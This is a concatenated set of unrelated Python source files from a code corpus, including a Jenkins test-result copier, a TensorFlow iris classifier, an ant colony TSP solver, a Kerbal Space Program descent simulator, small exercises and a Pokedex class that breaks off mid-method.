work\")","repo_name":"katielin019/bubbles_final_paper","sub_path":"scripts/entro.py","file_name":"entro.py","file_ext":"py","file_size_in_byte":4715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42254484421","text":"#!/usr/bin/env python3\n\nimport os\nimport subprocess\nimport sys\nimport pathlib\n\nprint ('Number of arguments:', len(sys.argv))\nprint ('Argument List:', str(sys.argv))\n\nif len(sys.argv) < 3:\n\tsys.exit(-1)\n\njenkins_workspace = sys.argv[1]\ntbot_path = sys.argv[2]\n\nprename = \"raspi-bbb\"\nwp = \"/home/hs/src/bbb/tbot-tbot2go\"\nres_path = \"results\"\n\n# generate junit file\nres = subprocess.run([f\"{wp}/generate_all.sh\", tbot_path], stdout=subprocess.PIPE)\n# get log number\nlogs = list(pathlib.Path(\"results/junit\").glob(f\"{prename}-*.xml\"))\nlogs.sort()\nlog = logs[-1]\nlog = str(log)\nnumber = log.split(\"-\")[2]\nnumber = number.split(\".\")[0]\nname = f\"{prename}-{number}\"\nres = subprocess.run([\"cp\", f\"results/junit/{name}.xml\", jenkins_workspace + 
\"/tbot_results.xml\"], stdout=subprocess.PIPE)\n\n# setup subdir for tbot results\nclassname = \"\"\nwith open(jenkins_workspace + \"/tbot_results.xml\", \"r\") as f:\n for line in f:\n if \"classname=\" in line:\n line = line.split('\"')\n classname = line[1]\n break\n\nif classname == \"\":\n print(\"Could not detect classname\")\n sys.exit(-1)\n\nclassname = \"tbot_results\"\njenkins_workspace_tbot = jenkins_workspace + \"/\" + classname\nres = subprocess.run([\"mkdir\", \"-p\", jenkins_workspace_tbot], stdout=subprocess.PIPE)\n\n# cp dot results\nsubdirname = \"dot\"\ntmpp = f\"{res_path}/{subdirname}\"\nres = subprocess.run([\"test\", \"-f\", f\"{tmpp}/{name}.jpg\"], stdout=subprocess.PIPE)\nif res.returncode == 0:\n res = subprocess.run([\"cp\", f\"{tmpp}/{name}.dot\", f\"{jenkins_workspace_tbot}\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/{name}.jpg\", f\"{jenkins_workspace_tbot}/graph.jpg\"], stdout=subprocess.PIPE)\nelse:\n res = subprocess.run([\"echo\", f\" RES {res}\"], stdout=subprocess.PIPE)\n\n# cp html results\nsubdirname = \"html\"\ntmpp = f\"{res_path}/{subdirname}\"\nres = subprocess.run([\"test\", \"-f\", f\"{tmpp}/{name}.html\"], stdout=subprocess.PIPE)\nif res.returncode == 0:\n res = subprocess.run([\"cp\", f\"{tmpp}/myscript.js\", f\"{jenkins_workspace_tbot}\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/{name}.html\", f\"{jenkins_workspace_tbot}\"], stdout=subprocess.PIPE)\nelse:\n res = subprocess.run([\"echo\", f\" RES {res}\"], stdout=subprocess.PIPE)\n\n# cp statistic\nsubdirname = \"stats\"\ntmpp = f\"{res_path}/{subdirname}\"\nres = subprocess.run([\"test\", \"-f\", f\"{tmpp}/{name}.jpg\"], stdout=subprocess.PIPE)\nif res.returncode == 0:\n res = subprocess.run([\"cp\", f\"{tmpp}/balkenplot.sem\", f\"{jenkins_workspace_tbot}\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/{name}.jpg\", f\"{jenkins_workspace_tbot}/statistic.jpg\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/{name}.txt\", f\"{jenkins_workspace_tbot}/statistic_data.txt\"], stdout=subprocess.PIPE)\nelse:\n res = subprocess.run([\"echo\", f\" RES {res}\"], stdout=subprocess.PIPE)\n\n# cp ptest\nsubdirname = \"ptest\"\ntmpp = f\"{res_path}/{subdirname}\"\nres = subprocess.run([\"test\", \"-f\", f\"{tmpp}/{name}.jpg\"], stdout=subprocess.PIPE)\nif res.returncode == 0:\n res = subprocess.run([\"cp\", f\"{tmpp}/{name}.jpg\", f\"{jenkins_workspace_tbot}/ptest.jpg\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/{name}.txt\", f\"{jenkins_workspace_tbot}/ptest_data.txt\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/balkenplot.sem\", f\"{jenkins_workspace_tbot}/balkenplot_ptest.sem\"], stdout=subprocess.PIPE)\nelse:\n res = subprocess.run([\"echo\", f\" RES {res}\"], stdout=subprocess.PIPE)\n\n# iperf ptest\nsubdirname = \"iperf\"\ntmpp = f\"{res_path}/{subdirname}\"\nres = subprocess.run([\"test\", \"-f\", f\"{tmpp}/iperf.jpg\"], stdout=subprocess.PIPE)\nif res.returncode == 0:\n res = subprocess.run([\"cp\", f\"{tmpp}/iperf.jpg\", f\"{jenkins_workspace_tbot}/iperf.jpg\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/iperf.dat\", f\"{jenkins_workspace_tbot}/iperf_data.txt\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/balkenplot_iperf.sem\", f\"{jenkins_workspace_tbot}/balkenplot_iperf.sem\"], stdout=subprocess.PIPE)\nelse:\n res = subprocess.run([\"echo\", f\" RES {res}\"], stdout=subprocess.PIPE)\n\n# latency 
ptest\nsubdirname = \"latency\"\ntmpp = f\"{res_path}/{subdirname}\"\nres = subprocess.run([\"test\", \"-f\", f\"{tmpp}/latency.jpg\"], stdout=subprocess.PIPE)\nif res.returncode == 0:\n res = subprocess.run([\"cp\", f\"{tmpp}/latency.jpg\", f\"{jenkins_workspace_tbot}/latency.jpg\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/latency.dat\", f\"{jenkins_workspace_tbot}/latency_data.txt\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/balkenplot.sem\", f\"{jenkins_workspace_tbot}/balkenplot_latency.sem\"], stdout=subprocess.PIPE)\nelse:\n res = subprocess.run([\"echo\", f\" RES {res}\"], stdout=subprocess.PIPE)\n","repo_name":"EmbLux-Kft/tbot-tbot2go","sub_path":"generate_jenkins_result.py","file_name":"generate_jenkins_result.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24001626616","text":"import tensorflow as tf\nimport os\nfrom tensorflow.keras.layers import Layer\n\ntrain_dataset_url = 'https://storage.googleapis.com/download.tensorflow.org/data/iris_training.csv';\n\ntrain_dataset_raw = tf.keras.utils.get_file(fname = os.path.basename((train_dataset_url)), origin = train_dataset_url)\n\ncolumn_names = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'species']\n\nfeature_names = column_names[:-1]\nlabel_name = column_names[-1]\n\nclass_names = ['Iris setosa', 'Iris versicolor', 'Iris virginica']\n\nbatch_size = 32\n\ntrain_dataset = tf.data.experimental.make_csv_dataset(train_dataset_raw, batch_size, column_names=column_names, label_name=label_name, num_epochs=1)\n\n\ndef pack_features_vector(features, labels):\n features = tf.stack(list(features.values()), axis = 1)\n return features, labels\n\ntrain_dataset = train_dataset.map(pack_features_vector)\n\nfeatures, labels = next(iter(train_dataset))\n# print(features)\n\nclass MyCustomLayer(Layer):\n def __init__(self, units=128, initializer='glorot_uniform', activation=None, name=None, **kwargs):\n super(MyCustomLayer, self).__init__(**kwargs)\n self.units = units\n self.initializer = initializer\n self.activation = activation\n if name:\n self._name = name\n def build(self, input_shape):\n self.w = self.add_weight(shape=(input_shape[-1], self.units), initializer=self.initializer, trainable=True)\n self.b = self.add_weight(shape=(self.units, ), initializer=self.initializer, trainable=True)\n def call(self, input_tensor):\n # result = tf.matmul(input_tensor, self.w) + self.b\n result = input_tensor @ self.w + self.b\n if (self.activation):\n result = self.activation(result)\n return result\n\nmodel = tf.keras.Sequential([\n tf.keras.layers.Dense(10, activation=tf.nn.relu, input_shape=(4, )),\n MyCustomLayer(10, activation=tf.nn.relu),\n tf.keras.layers.Dense(3)\n])\n\npredictions = model(features)\n\nloss_object = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\n\ndef loss(model, x, y, training):\n predicted = model(x, training=training)\n return loss_object(y_true=y, y_pred=predicted)\n\ndef grad(model, inputs, targets):\n with tf.GradientTape() as tape:\n loss_value = loss(model, inputs, targets, training=True)\n return loss_value, tape.gradient(loss_value, model.trainable_variables)\n\noptimizer = tf.keras.optimizers.SGD(learning_rate=0.01)\nloss_value, grads = grad(model, features, labels)\n\noptimizer.apply_gradients(zip(grads, model.trainable_variables))\n\nEPOCHS=100\n\ntrain_loss_results = []\ntrain_accuracy_results = []\n\nfor epoch in 
range(EPOCHS):\n epoch_average_loss = tf.keras.metrics.Mean()\n epoch_accuracy = tf.keras.metrics.SparseCategoricalAccuracy()\n for (x, y) in train_dataset:\n loss_value, grads = grad(model, x, y)\n optimizer.apply_gradients(zip(grads, model.trainable_variables))\n epoch_average_loss.update_state(loss_value)\n epoch_accuracy.update_state(y, model(x, training=True))\n print(\"Epoch {epoch} | Loss: {loss} | Accuracy: {accuracy}\".format(epoch=epoch, loss=epoch_average_loss.result(), accuracy=epoch_accuracy.result()))\n train_loss_results.append(epoch_average_loss.result())\n train_accuracy_results.append(epoch_accuracy.result())","repo_name":"hypothetical-andrei/wmda-pub-assets","sub_path":"c6/tf-nn4.py","file_name":"tf-nn4.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"13300854986","text":"from math import sqrt\nfrom random import randint, random\n\nants_number = 50\niterations = 1000\nartificial_pheromone = 1.0\nevaporation_rate = 0.1\nQ = 1.0\nalpha = 1.0\n\nBays29 = [\n [1, 1150.0, 1760.0],\n [2, 630.0, 1660.0],\n [3, 40.0, 2090.0],\n [4, 750.0, 1100.0],\n [5, 750.0, 2030.0],\n [6, 1030.0, 2070.0],\n [7, 1650.0, 650.0],\n [8, 1490.0, 1630.0],\n [9, 790.0, 2260.0],\n [10, 710.0, 1310.0],\n [11, 840.0, 550.0],\n [12, 1170.0, 2300.0],\n [13, 970.0, 1340.0],\n [14, 510.0, 700.0],\n [15, 750.0, 900.0],\n [16, 1280.0, 1200.0],\n [17, 230.0, 590.0],\n [18, 460.0, 860.0],\n [19, 1040.0, 950.0],\n [20, 590.0, 1390.0],\n [21, 830.0, 1770.0],\n [22, 490.0, 500.0],\n [23, 1840.0, 1240.0],\n [24, 1260.0, 1500.0],\n [25, 1280.0, 790.0],\n [26, 490.0, 2130.0],\n [27, 1460.0, 1420.0],\n [28, 1260.0, 1910.0],\n [29, 360.0, 1980.0]\n]\n\ndef _distance(n1, n2):\n dx = n1[1] - n2[1]\n dy = n1[2] - n2[2]\n return sqrt(dx * dx + dy * dy)\n\ndistances = [[] for _ in range(len(Bays29))]\npheromones = [[] for _ in range(len(Bays29))]\nants = [{} for _ in range(ants_number)]\n\nfor i in range(len(Bays29)):\n for j in range(i):\n distances[i].append(_distance(Bays29[i], Bays29[j]))\n pheromones[i].append(artificial_pheromone)\n\ndef get_distance(n1, n2):\n if n1 < n2:\n return distances[n2][n1]\n return distances[n1][n2]\n\ndef get_pheromones(n1, n2):\n if n1 < n2:\n return pheromones[n2][n1]\n return pheromones[n1][n2]\n\ndef set_pheromones(n1, n2, value):\n if n1 < n2:\n pheromones[n2][n1] = value\n else:\n pheromones[n1][n2] = value\n\ndef get_cost(tour):\n cost = 0\n for i in range(len(tour)):\n cost += get_distance(tour[i - 1], tour[i])\n return cost\n\nfor ant in ants:\n ant['edge'] = randint(0, len(Bays29) - 1)\n ant['tabu'] = []\n\nbest_tour = [i for i in range(len(Bays29))]\nbest_tour_cost = get_cost(best_tour)\n\nfor iter in range(iterations):\n for ant in ants:\n while True:\n pvalues = [[i, get_pheromones(ant['edge'], i)**alpha] for i in range(len(Bays29)) if i not in ant['tabu'] and i != ant['edge']]\n\n if len(pvalues) == 0:\n ant['tabu'].append(ant['edge'])\n cost = get_cost(ant['tabu'])\n if cost < best_tour_cost:\n best_tour = ant['tabu']\n best_tour_cost = cost\n print(iter, cost, best_tour, flush=True)\n ant['tabu'] = []\n break\n\n total_pheromones = 0.0\n for value in pvalues:\n total_pheromones += value[1]\n\n rand = random()\n total = 0\n for i in range(len(pvalues)):\n total += pvalues[i][1] / total_pheromones\n if total >= rand:\n break\n ant['tabu'].append(ant['edge'])\n ant['edge'] = pvalues[i][0]\n\n # online pheromone update rules\n #n1, n2 = ant['tabu'][-1], ant['edge']\n 
#pvalue = get_pheromones(n1, n2)\n #set_pheromones(n1, n2, pvalue + Q / get_distance(n1, n2))\n\n # evaporate pheromones\n pheromones = [[(1 - evaporation_rate) * pvalue for pvalue in plist] for plist in pheromones]\n # offline pheromone update rules\n for i in range(len(best_tour)):\n n1, n2 = best_tour[i - 1], best_tour[i]\n pvalue = get_pheromones(n1, n2)\n set_pheromones(n1, n2, pvalue * (1 - evaporation_rate) + evaporation_rate * max(max(p) for p in pheromones if p))\n","repo_name":"tcooc/adaptive4","sub_path":"py/aco.py","file_name":"aco.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36877532199","text":"#!/usr/bin/python3.5\n#RK4 flight integration\n\nfrom math import *\n\n#useful constants\nKerbinMu = 3.5316e12 #gravitational parameter\nKerbinR = 6e5\nKerbinDay = 21549.425\nKerbing0 = KerbinMu/KerbinR**2\nKerbinAtm = 101.325\nKerbinAtmScale1 = 6930.5\nKerbinAtmScale2 = 20240.0\n\nclass Engine:\n def __init__(self, vacIsp, slIsp, maxthrustvac):\n self.ispv = vacIsp\n self.isps = slIsp\n self.maxff = maxthrustvac/vacIsp/Kerbing0\n\n def thrust(self, press = 0, thrustlevel = 1.0, thrustlim = 1.0):\n if press > 0:\n return Kerbing0*thrustlevel*thrustlim*self.maxff*(self.ispv + (self.isps-self.ispv)*press/KerbinAtm)\n else:\n return Kerbing0*thrustlevel*thrustlim*self.maxff*self.ispv\n\nclass EngineMount:\n def __init__(self, Engn, attAngle, thrustlim = 1.0):\n \"Input attAngle in deg, self.angle in radians\"\n self.engine = Engn\n self.angle = attAngle/180.0*3.1415927\n self.englimit = thrustlim\n\nEngineDic = {'Reliant': Engine(310,265,240e3), 'Swivel': Engine(320,250,215e3), 'Thud': Engine(305,275,120e3), 'Spark': Engine(320,270,20e3), 'Twitch': Engine(290,250,16e3), 'Terrier': Engine(345,85,60e3), 'Vector': Engine(315,295,1.0e6), 'Skipper': Engine(320,280,650e3), 'Mainsail': Engine(310,285,1.5e6), 'TwinBoar': Engine(300,280,2.0e6), 'Poodle': Engine(350,90,250e3), 'Rhino': Engine(340,205,2.0e6), 'Mammoth': Engine(315,295,4.0e6), 'VestaVR1': Engine(335,260,90e3)}\n\ndef KerbinGravConst(h,lat=0):\n \"Calculate gravity acceleration at Kerbin, height h in meters, latitude in degrees\"\n return KerbinMu/(KerbinR+h)**2 - (2*3.1415927/KerbinDay)**2*KerbinR*cos(lat/180.0*3.1415927)\n\ndef KerbinPressure(h):\n if h < 70000:\n return KerbinAtm*exp(-h/KerbinAtmScale1 - (h/KerbinAtmScale2)**2)\n else:\n return 0\n\ndef DragForce(p, v, dragcoeff):\n return dragcoeff*p*29/305/8.314*v**2/2\n\t\ndef VesselMass(mwet,mdry,fuelflow,t):\n return max(mdry,mwet-fuelflow*t)\n \ndef TotalThrust(EngMntList,press,thrustlevel = 1.0):\n \"First output value is thrust in Newtons, second is effective Isp in seconds\"\n sumthrust = 0\n sumff = 0\n for em in EngMntList:\n sumthrust += em.engine.thrust(press, thrustlevel, em.englimit)*cos(em.angle)\n sumff += em.engine.maxff * thrustlevel\n return [ sumthrust, sumthrust/sumff/Kerbing0 ]\n\ndef dvexdh(EngMntList, hasl, press, pressasl):\n \"Returns du/dh at height Hasl above sea level\"\n if press == 0:\n return 0\n hscale = hasl/log(pressasl/press) #assuming p=p0exp(-h/hscale)\n vexh = TotalThrust(EngMntList, press)[1]\n vexsl = TotalThrust(EngMntList, pressasl)[1]\n dvexdp = (vexh - vexsl)/(press - pressasl)*Kerbing0\n \n return -press/hscale*dvexdp\n\ndef intlog(x):\n \"Returns indefinite integral of ln(x)\"\n return x*(log(x) - 1)\n \ndef RK4integrate(h0, v0, mwet, mdry, dragcoeff, dt, maxtime, enginelist, thrustlevel, lat=0, fn=\"log\", 
OutputAsCSV=False):\n if OutputAsCSV:\n filesuffix = \".csv\"\n delimiter = \"; \"\n else:\n filesuffix = \".txt\"\n delimiter = \" \" \n mass = mwet\n tt = 0\n h1 = h0\n v1 = v0\n \n dgdh = -2*KerbinMu/(KerbinR + h0)**3 #gradient of free fall acceleration\n thrustisp = TotalThrust(enginelist, KerbinPressure(h0), thrustlevel)\n effthrust = thrustisp[0]\n exhvel = thrustisp[1]*Kerbing0\n fuelflow = effthrust/exhvel\n tburn = (mwet-mdry)/fuelflow\n \n drag = DragForce(KerbinPressure(h0), v0, dragcoeff)\n geff = KerbinGravConst(h0,lat) - drag/(3*mass)\n maxa = effthrust/mass\n dudh = dvexdh(enginelist, h0, KerbinPressure(h0), KerbinAtm)\n\n v_lin_term = maxa - geff\n v_sq_term = maxa**2/(exhvel*2) + 1.0/6.0*fuelflow/mass*dudh*v0 - dgdh*v0 / 3.0\n \n print(repr(dgdh))\n\n ts = (-v_lin_term + sqrt( v_lin_term**2 - 4*v0*v_sq_term ) ) / (2*v_sq_term)\n \n #dv/dt = (v_e[0] + v_e[1]t + v_e[2]t^2)/(v_d - t) + A*(v0 - v0/ts*t)^2 - (g + dg/dh*v0*t - v0/ts*dg/dh*t^2/2)\n v_e = [ exhvel, dudh*v0, -dudh*v0/(2*ts) ]\n v_d = mass/fuelflow\n \n dv_frac_const = -(v_e[1] + v_e[2]*v_d)\n dv_frac_lin = -v_e[2] - dgdh*v0\n dv_frac_e = v_e[0] - v_d * dv_frac_const\n \n hs = -v0*ts + (KerbinGravConst(h0,lat) - drag/(2*mass) - dv_frac_const)*ts**2/2 - dv_frac_e * v_d *(1 + intlog(1 - ts/v_d)) - dv_frac_lin/6*ts**3\n \n outfile = open(fn+filesuffix,\"wt\")\n \n outfile.write(\"Guess of t_s, h_s:\\n\")\n outfile.write(\"t_s = \" + '{0:.2f}'.format(ts) + \" s\" + delimiter + \"h_s = \" + '{0:.1f}'.format(hs) + \" m\\n\")\n \n outfile.write(\"Time,s\" + delimiter + \"Distance traveled\" + delimiter + \" H, m\" + delimiter + \"VSpeed, m/s\" + delimiter + \"Isp, s\\n\")\n \n while (tt <= maxtime) and (v1 < 0):\n outfile.write('{0:.3f}'.format(tt) + delimiter + '{}'.format(h0-h1) + delimiter + '{}'.format(h1) + delimiter + '{}'.format(v1) + delimiter + repr(TotalThrust(enginelist, KerbinPressure(h1))[1]) + \"\\n\")\n\t\t\n k1a = (TotalThrust(enginelist, KerbinPressure(h1), thrustlevel)[0]*max(0,copysign(1,tburn-tt)) - DragForce(KerbinPressure(h1), v1, dragcoeff)*copysign(1,v1))/VesselMass(mwet,mdry,fuelflow,tt) - KerbinGravConst(h1,lat)\n k1v = v1\n \n h2 = h1 + k1v*dt*0.5\n v2 = v1 + k1a*dt*0.5\n \n k2a = (TotalThrust(enginelist, KerbinPressure(h2), thrustlevel)[0]*max(0,copysign(1,tburn-tt-dt*0.5)) - DragForce(KerbinPressure(h2), v2, dragcoeff)*copysign(1,v2))/VesselMass(mwet,mdry,fuelflow,tt+dt*0.5) - KerbinGravConst(h2,lat)\n k2v = v2\n \n h3 = h1 + k2v*dt*0.5\n v3 = v1 + k2a*dt*0.5\n \n k3a = (TotalThrust(enginelist, KerbinPressure(h3), thrustlevel)[0]*max(0,copysign(1,tburn-tt-dt*0.5)) - DragForce(KerbinPressure(h3), v3, dragcoeff)*copysign(1,v3))/VesselMass(mwet,mdry,fuelflow,tt+dt*0.5) - KerbinGravConst(h3,lat)\n k3v = v3\n \n h4 = h1 + k3v*dt\n v4 = v1 + k3a*dt\n \n k4a = (TotalThrust(enginelist, KerbinPressure(h4), thrustlevel)[0]*max(0,copysign(1,tburn-tt-dt)) - DragForce(KerbinPressure(h4), v4, dragcoeff)*copysign(1,v4))/VesselMass(mwet,mdry,fuelflow,tt+dt) - KerbinGravConst(h4,lat)\n k4v = v4\n \n h1 = h1 + dt/6.0*(k1v+2*k2v+2*k3v+k4v)\n v1 = v1 + dt/6.0*(k1a+2*k2a+2*k3a+k4a)\n \n tt=tt+dt\n \n outfile.close()\n return 0\n\nEngineList = [EngineMount(EngineDic['Thud'],22.0719225), EngineMount(EngineDic['Thud'],22.0719225), EngineMount(EngineDic['Thud'],22.0719225), EngineMount(EngineDic['Thud'],22.0719225)]\n\nUserThrustLevel = 0.75\nInitialHeight = 3500 #above sea level\nInitialVspeed = -60\nInitialMass = 23000\nDryMass = 15800\nDragArea = 9.8\nTimestep = 0.01\nMaxIntegrationTime = 1000\nInitLatitude = 
90\n\nLogFile = \"droplog_1_\" + '{0:.0f}'.format(InitialHeight) + \"_\" + '{0:.0f}'.format(-InitialVspeed)\n\nRK4integrate(InitialHeight, InitialVspeed, InitialMass, DryMass, DragArea, Timestep, MaxIntegrationTime, EngineList, UserThrustLevel, InitLatitude, LogFile,True)\n","repo_name":"pand5461/Droptest","sub_path":"droptest_betterispacc.py","file_name":"droptest_betterispacc.py","file_ext":"py","file_size_in_byte":6624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20522084667","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@version: Python 2.7.6 on win10(64)\n@author: BingZhen Zhou\n@contact: 953129171@qq.com\n@file name: fancself\n@time: 2018/7/7 9:07\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfigheight = 8\nfig = plt.figure(2, figsize=(9, figheight), dpi=80, facecolor=\"white\")\nfontsize = 0.4 * fig.dpi\nax = fig.add_subplot(111, frameon=False, xticks=[], yticks=[])\nstylename = \"square\"\n# ax.text(2, 2.5, stylename+\"hhhhhhhhhhhh$\\sum_{k=0}^n$\" ,ha=\"center\",\n# size=fontsize,\n# # transform=ax.transAxes,\n# bbox=dict(boxstyle=stylename, fc=\"w\", ec=\"k\"))\nax.annotate('$\\sum_{k=0}^x$', (1, 1), (300, 300),\n xycoords='data',size=fontsize,\n textcoords='offset points',\n bbox=dict(boxstyle=\"round\", fc=\"1\"),\n arrowprops=dict(arrowstyle=\"->\",\n connectionstyle=\"angle,angleA=90,angleB=0,rad=10\"))\n\nax.annotate( '$\\sum_{k=0}^n$',\n xytext=(-300, -300), xycoords='data',size=fontsize,\n xy=(4.1, 4.4), textcoords='offset points',\n bbox=dict(boxstyle=\"round4\", fc=\"1\"),\n arrowprops=dict(arrowstyle=\"->\",\n connectionstyle=\"angle,angleA=90,angleB=0,rad=10\"))\nax.set(xlim=(0, 5), ylim=(0, 5))\n# c = plt.Circle((0.5,0.5), 1)\n# ax.plot(c)\nax.set_aspect('equal', 'box')\n# x = np.linspace(0,np.pi,30)\n# ax.plot(x, np.sin(x))\n# ax.plot([0.1,0.3],[0.2,0.4])\nplt.show()","repo_name":"zbzhen/PycharmProjects","sub_path":"matplotlibex/fancself.py","file_name":"fancself.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15990620889","text":"\ndef spiral_order(mat):\n i, j = 0, 0\n\n N = len(mat) * len(mat[0])\n visited = [[False for i in range(len(mat[0]))] for j in range(len(mat))]\n ans = [mat[i][j]]\n\n count = 1\n visited[i][j] = True\n\n while count < N:\n while j+1 < len(mat[0]) and not visited[i][j+1]:\n j += 1\n ans.append(mat[i][j])\n visited[i][j] = True\n count += 1\n while i+1 < len(mat) and not visited[i+1][j]:\n i += 1\n ans.append(mat[i][j])\n visited[i][j] = True\n count += 1\n while j-1 >= 0 and not visited[i][j-1]:\n j -= 1\n ans.append(mat[i][j])\n visited[i][j] = True\n count += 1\n while i-1 >= 0 and not visited[i-1][j]:\n i -= 1\n ans.append(mat[i][j])\n visited[i][j] = True\n count += 1\n return ans\n\n\nif __name__==\"__main__\":\n # matrix = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n matrix = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n output = spiral_order(matrix)\n print(output)","repo_name":"thenakulchawla/ubiquitous-barnacle","sub_path":"arrays/spiral_matrix.py","file_name":"spiral_matrix.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2557506021","text":"N = int(input('N = '))\n\n\n\"\"\"\n# while statement\n\ni = 1\nsum = 0\nwhile (i <= N):\n sum += i\n i += 1\n\nprint(sum)\n\"\"\"\n\n# for statement\n\nsum = 0\nfor i in range(1, N + 1):\n sum 
+= i\n\nprint(sum)","repo_name":"BLINK-ONCE/Storage","sub_path":"python/python study/act 1/while for 프로그래밍 연습(1).py","file_name":"while for 프로그래밍 연습(1).py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29379878119","text":"def ss(s,n):\n a = []\n for i in range(len(s)):\n if s[i:n+i] not in a and len(s[i:n+i]) == n:\n c = s.count(s[i:n+i])\n if c <= 1:\n a.append(s[i:n+i])\n if a.count('AAA') == 1:\n a = []\n if len(a) > 0:\n for i in a:\n print(i)\n else:\n print('ninguna')\n\ns = input()\nn = int(input())\nss(s,n)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito2_ej3/hito2_ej3_64c4462b12a78ca670f47a4cc61d6d23.py","file_name":"hito2_ej3_64c4462b12a78ca670f47a4cc61d6d23.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30590125142","text":"import csv\nimport random\n\n\n\nclass Pokemon:\n def __init__(self, id, name, type1, type2, generation, legendary, total):\n self.id = id\n self.name = name\n self.type1 = type1\n self.type2 = type2\n self.generation = generation\n self.legendary = bool(legendary)\n self.total = total\n\nclass Pokedex:\n def __init__(self, csv_file_path):\n self.pokemon_list = []\n self.load_data(csv_file_path)\n\n def load_data(self, csv_file_path):\n with open(csv_file_path, newline='') as file:\n reader = csv.DictReader(file)\n for row in reader:\n legendary = True if row['Legendary'] == \"True\" else False\n pokemon = Pokemon(\n id=row['#'],\n name=row['Name'],\n type1=row['Type 1'],\n type2=row['Type 2'],\n generation=int(row['Generation']),\n legendary=legendary,\n total=int(row['Total'])\n )\n self.pokemon_list.append(pokemon)\n\n def get_all_pokemon(self):\n return self.pokemon_list\n\n def get_pokemon_by_name(self, name):\n for pokemon in self.pokemon_list:\n if pokemon.name.lower() == name.lower():\n return pokemon\n return None\n \n def get_pokemon_by_search(self, name: str):\n if len(name) < 3:\n return []\n \n matching_pokemon = [pokemon for pokemon in self.pokemon_list if name.lower() in pokemon.name.lower()]\n return matching_pokemon\n\n def get_pokemon_by_id(self, id):\n id = str(id)\n for pokemon in self.pokemon_list:\n if str(pokemon.id) == id:\n return pokemon\n return None\n \n def get_pokemon_by_type1(self, type1):\n matching_pokemon = []\n for pokemon in self.pokemon_list:\n if pokemon.type1.lower() == type1.lower():\n matching_pokemon.append(pokemon)\n return matching_pokemon\n \n # Could use list comprehension instead\n # def get_pokemon_by_type1(self, type1):\n # return [pokemon for pokemon in self.pokemon_list if pokemon.type1.lower() == type1.lower()]\n \n def get_pokemon_by_type2(self, type2):\n matching_pokemon = []\n for pokemon in self.pokemon_list:\n if pokemon.type2.lower() == type2.lower():\n matching_pokemon.append(pokemon)\n return matching_pokemon\n \n def get_pokemon_by_type(self, type):\n matching_pokemon = []\n for pokemon in self.pokemon_list:\n if pokemon.type1.lower() == type.lower() or pokemon.type2.lower() == type.lower():\n matching_pokemon.append(pokemon)\n return matching_pokemon\n \n def get_pokemon_by_generation(self, generation):\n matching_pokemon = []\n for pokemon in self.pokemon_list:\n if pokemon.generation == generation:\n matching_pokemon.append(pokemon)\n return matching_pokemon\n \n def get_pokemon_by_legendary(self):\n legendary_pokemon = []\n for pokemon in self.pokemon_list:\n if 
pokemon.legendary: \n legendary_pokemon.append(pokemon)\n return legendary_pokemon\n \n def get_random_team(self):\n team_size = 6\n random_team = random.sample(self.pokemon_list, team_size)\n return random_team\n \n def get_strong_team(self):\n team_size = 6\n\n # Calculate the total stats for all Pokémon\n total_stats = [pokemon.total for pokemon in self.pokemon_list]\n\n # Determine the cutoff for the top 20% of total stats\n cutoff = int(len(total_stats) * 0.2)\n top_pokemon_indices = sorted(range(len(total_stats)), key=lambda i: total_stats[i], reverse=True)[:cutoff]\n\n # Sort the top indices again and select random Pokémon from the top 20%\n sorted_top_pokemon_indices = sorted(top_pokemon_indices)\n strong_team = random.sample([self.pokemon_list[i] for i in sorted_top_pokemon_indices], k=team_size)\n return strong_team\n \n def get_weak_team(self):\n team_size = 6\n\n # Calculate the total stats for all Pokémon\n total_stats = [pokemon.total for pokemon in self.pokemon_list]\n\n # Determine the cutoff for the lowest 20% of total stats\n cutoff = int(len(total_stats) * 0.2)\n lowest_pokemon_indices = sorted(range(len(total_stats)), key=lambda i: total_stats[i])[:cutoff]\n\n # Sort the lowest indices again and select unique Pokémon from the lowest 20%\n sorted_lowest_pokemon_indices = sorted(lowest_pokemon_indices)\n weak_team_indices = random.sample(sorted_lowest_pokemon_indices, k=team_size)\n weak_team = [self.pokemon_list[i] for i in weak_team_indices]\n return weak_team\n \n def get_legendary_team(self):\n team_size = 